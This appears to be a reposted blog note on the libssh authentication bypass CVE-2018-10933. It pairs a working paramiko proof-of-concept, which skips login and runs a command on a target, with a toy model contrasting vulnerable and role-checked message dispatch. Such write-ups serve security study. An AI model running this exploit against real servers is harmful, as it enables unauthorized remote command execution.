  • CVE-2018-10933 LibSSH auth bypass

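    Vulnerability principle
    The authentication implementation is flawed:
    authentication is split into multiple steps, and a client can jump straight to the success step.

    A vulnerability was found in libssh's server-side state machine before versions 0.7.6 and 0.8.4.
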
    22/tcp open  ssh     libssh 0.8.3 (protocol 2.0)
    | ssh-hostkey:
    |_  2048 fe:d7:54:08:9d:1c:ba:18:4c:ba:22:3c:75:c9:39:5e (RSA)
     
     
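    import paramiko
    import socket

    sock = socket.socket()
    try:
        sock.connect((str('192.168.232.198'), int(22)))

        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        # Version exchange and key exchange as an ordinary client
        transport.start_client()

        # Send SSH_MSG_USERAUTH_SUCCESS, a message that only the server should
        # send, in place of an authentication request
        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)

        # On a vulnerable server the session is now treated as authenticated
        cmd = transport.open_session()

        stdin, stdout, stderr = cmd.exec_command("touch /tmp/3")
        res, err = stdout.read(), stderr.read()
        result = res if res else err

        print(result)
    except:
        pass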
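
The flaw described above (a server that lets its peer jump to the success step) as a toy model, with the unchecked dispatcher beside one that filters messages by role before dispatch. This is an added example, not libssh's code and not part of the original post; `Session`, the handler names, `replay` and the sample account are hypothetical, and only the message numbers (RFC 4252 / RFC 4254) are real.

```python
from dataclasses import dataclass

# Message numbers from RFC 4252 (auth) and RFC 4254 (channels).
MSG_USERAUTH_REQUEST, MSG_USERAUTH_SUCCESS, MSG_CHANNEL_OPEN = 50, 52, 90
CREDENTIALS = {"alice": "correct horse"}  # constructed sample account


@dataclass
class Session:
    is_server: bool = True
    authenticated: bool = False


def on_userauth_request(s, payload):
    user, password = payload
    s.authenticated = CREDENTIALS.get(user) == password
    return "auth ok" if s.authenticated else "auth failed"


def on_userauth_success(s, payload):
    # Written for the client role: the peer reports that our login succeeded.
    s.authenticated = True
    return "auth ok"


def on_channel_open(s, payload):
    return "channel opened" if s.authenticated else "channel denied"


HANDLERS = {
    MSG_USERAUTH_REQUEST: on_userauth_request,
    MSG_USERAUTH_SUCCESS: on_userauth_success,
    MSG_CHANNEL_OPEN: on_channel_open,
}


def vulnerable_dispatch(s, msg_type, payload=None):
    # Flaw: one handler table for both roles, no check of who may send what.
    return HANDLERS[msg_type](s, payload)


def hardened_dispatch(s, msg_type, payload=None):
    # Filter before dispatch: a server never accepts USERAUTH_SUCCESS from its peer.
    if msg_type == MSG_USERAUTH_SUCCESS and s.is_server:
        return "rejected: unexpected message for server role"
    return HANDLERS[msg_type](s, payload)


def replay(dispatch, messages):
    # Feed a message sequence to a fresh server session; return results and final state.
    s = Session()
    return [dispatch(s, *m) for m in messages], s.authenticated
```

Replaying the two-message sequence `[(MSG_USERAUTH_SUCCESS,), (MSG_CHANNEL_OPEN,)]` through each dispatcher shows the difference: the unchecked one ends authenticated, the filtered one rejects the first message and denies the channel.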
  • Original article: https://www.cnblogs.com/junmoxiao/p/11965788.html